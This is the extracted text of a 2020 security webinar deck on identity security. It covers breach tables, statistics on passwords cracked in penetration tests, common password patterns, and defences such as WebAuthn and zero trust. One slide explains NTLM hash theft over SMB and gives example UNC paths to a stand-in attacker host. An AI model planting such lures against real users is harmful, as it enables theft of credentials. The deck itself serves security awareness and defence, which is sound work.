This webinar describes and analyses data we collected from millions of cracked passwords obtained during attack and penetration tests performed against dozens of corporate customers worldwide... and what that could mean for your organisation!

1. 1/30/2020 1
IDENTITY AND
SECURITY
Learning from data
by Charl Van Der Walt
@charlvdwalt

2. 1/30/2020 2
WE HAVE A SOLUTION FOR YOU!

3. 1/30/2020 3
HOW ARE WE GETTING OWNED?

4. 1/30/2020 4
Date Victim Categories MTD State PWD Accident PPI
Feb-18 FedEx 5 Possibly No No Yes Yes
Feb-18 Swisscom 2 ? ? No Yes Yes
Feb-18 Tesla 3 Probably No No No No
Feb-18 City of Houston 4 No ? No No Yes
Mar-18 US universities, companies & government agencies 4 Yes Yes Yes No Yes
Mar-18 Under Armour - MyFitnessPal 2 Possibly ? Yes No Yes
Mar-18 RMH Franchise Holdings (Applebees Restaurants) 5 Yes ? No No Yes
Mar-18 California State University, Fresno 4 No ? Yes Yes Yes
Mar-18 City of Atlanta 5 Yes Yes Probably No Yes
Apr-18 MyEtherWallet.com 3 Possibly ? Yes No Probably
Apr-18 Saks Fifth Avenue and Lord & Taylor 3 Yes No Probably No Yes
Apr-18 Panerabread.com 6 Probably No No No Yes
Jun-18 MyHeritage 3 No ? Yes Yes Yes
Jun-18 Exactis 3 Possibly No No Yes Yes
Jun-18 Ticketmaster 4 No No No No Yes
Jun-18 Adidas 1 Possibly ? Yes No Yes
Jul-18 PIR Bank (Russia) 4 Yes No Unlikely No Yes
Jul-18 mSpy 3 No No Yes Yes Yes
Aug-18 Cosmos Bank 4 Possibly ? No No Yes
Sep-18 British Airways 4 No No No No Yes
Sep-18 Facebook 1 No ? No No Yes
Sep-18 Newegg 4 No No No No Yes
Oct-18 Cathay Pacific 2 Yes ? No No Yes
Nov-18 Marriott 4 Yes Possibly No No Yes

5. 1/30/2020 5
The real issues
Enabling business transformation
Stopping known exploits
Securing in-house & cloud applications
Changing user behaviour
Insecure endpoints
Know your enemy, Know thyself
Weak authentication
No barriers inside networks

6. 1/30/2020 6
The real issues
Enabling business transformation
Stopping known exploits
Securing in-house & cloud applications
Changing user behaviour
Insecure endpoints
Know your enemy, Know thyself
Weak authentication
No barriers inside networks
42%

7. 1/30/2020 7
LIFTING THE KIMONO

8. 1/30/2020 8

9. 1/30/2020 9

10. 1/30/2020 10

11. 1/30/2020 11

12. 1/30/2020 12

13. 1/30/2020 13

14. 1/30/2020 14
RED vs BLUE

15. 1/30/2020 15
WE THINK IN LISTS. ATTACKERS THINK IN GRAPHS.
https://blogs.technet.microsoft.com/johnla/2015/04/26/defenders-think-in-lists-attackers-
think-in-graphs-as-long-as-this-is-true-attackers-win/

16. 1/30/2020 16
WE THINK IN LISTS. ATTACKERS THINK IN GRAPHS
https://blogs.technet.microsoft.com/johnla/2015/04/26/defenders-think-in-lists-attackers-
think-in-graphs-as-long-as-this-is-true-attackers-win/

17. 1/30/2020 17
STUFF ALL THESE CREDENTIALS
OWASP.ORG

18. 1/30/2020 18

19. 1/30/2020 19
WHEN ALL ELSE FAILS

20. 1/30/2020 20

21. 1/30/2020 21
‘Free Wifi’
CorporateHQ
X
X

22. 1/30/2020 22
SMB Port 445
• Server Message Block (SMB) protocol
• Windows uses it to share files, printers and serial ports
• NTLM authentication is used
• Windows wants to make your life easy
• This can be used to steal NTLM challenge-response
password hashes from SMB clients
• Attackers can trick a target into connecting to their SMB
server
• UNC paths in websites, documents, phishing emails etc
• For example:
• attacker.comshare-namefile.txt
• file://///attacker.com/share/folder/file.txt

23. 1/30/2020 23
DNS Lookup
Encrypted Tunnel
Poisoned Lookup

24. 1/30/2020 24

25. 1/30/2020 25

26. 1/30/2020 26
CRACKING THE PASSWORD CODE

27. 1/30/2020 28
2 377 270 passwords
1 642 697 unique
646,898 passwords
497,136 unique
275 m 275 m
56%
44%
Unique
Cracked Not cracked
80%
20%
Normalised
Cracked Not cracked
220
275

28. 1/30/2020 29
PASSWORDS CRACKED PER CLIENT
0.00%
20.00%
40.00%
60.00%
80.00%
100.00%
120.00%

29. 1/30/2020 30
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
AFRICA AUS UK US ZA
PASSWORDS CRACKED PER COUNTRY
80%

30. 1/30/2020 31
0
50000
100000
150000
200000
250000
300000
350000
400000
450000
500000
1 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 45
• 88% of passwordscracked were 8 -
12 characters long.
• Enterprise users seem to be choosing
long passwords
• But length appears to have a
negligible impact on security

31. 1/30/2020 32
MOST POPULAR PASSWORDS - 2019

32. 1/30/2020 33
ALL THE MONTHS - 2018

33. 1/30/2020 34
52% of passwords end with 1, 2 or 3
digits on the end
0
50,000
100,000
150,000
200,000
250,000
0 1 2 3 4 5 6 7 8 9
HAPPY ENDING - 2019

34. 1/30/2020 35
ALL THE DATES - 2018
0.00%
2.00%
4.00%
6.00%
8.00%
10.00%
12.00%
1975
1976
1977
1978
1979
1980
1981
1982
1983
1984
1985
1986
1987
1988
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019

35. 1/30/2020 36
PREDICTABLE FORMATS - 2018

36. 1/30/2020 37
SO WHAT

37. 1/30/2020 38

38. 1/30/2020 39

39. 1/30/2020 40
• The desktop is the target
• Direct access to user data
• The desktop is the user
• Inherited privileges on other systems
• Easy access to domain credentials
• Direct access to user location, video and audio
• The desktop is a foothold
• Ideal location for lateral movement and pivoting
• Numerous channels for exfiltration
• Excessive event data makes monitoring hard
• The desktop is a soft target
• The desktop is a big target
• User behaviour creates complex human-
machine system
• Directly accessible from the Internet!

40. 1/30/2020 41

41. 1/30/2020 42
While most enterprises assume that the internal network is a safe environment in
which to expose corporate applications, Google’s experience has proven that this
faith is misplaced. Rather, one should assume that an internal network is as
fraught with danger as the public Internet and build enterprise applications based
upon this assumption.

42. 1/30/2020 43

43. 1/30/2020 44
KNOW who You Are
KNOW your Footprint
KNOW your Threat Model
KNOW your Vulnerabilities
KNOW how you react under assault
KNOW that something happened
KNOW what happened
KNOW what you’re going to do next

44. 1/30/2020 45
Think Authentication
The Web Authentication API (also known as
WebAuthn) is a specification written by
the W3C and FIDO, with the participation of
Google, Mozilla, Microsoft, Yubico, and others.
The API allows servers to register and
authenticate users using public key
cryptography instead of a password.
It allows servers to integrate with the strong
authenticators now built into devices, like
Windows Hello or Apple’s Touch ID. Instead of a
password, a private-public keypair (known as
a credential) is created for a website.
The private key is stored securely on the user’s
device; a public key and randomly generated
credential ID is sent to the server for storage.
The server can then use that public key to
prove the user’s identity.

45. 1/30/2020 46
Think Authentication

46. 1/30/2020 47
T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com
THANK YOU
Questions?
@charlvdwalt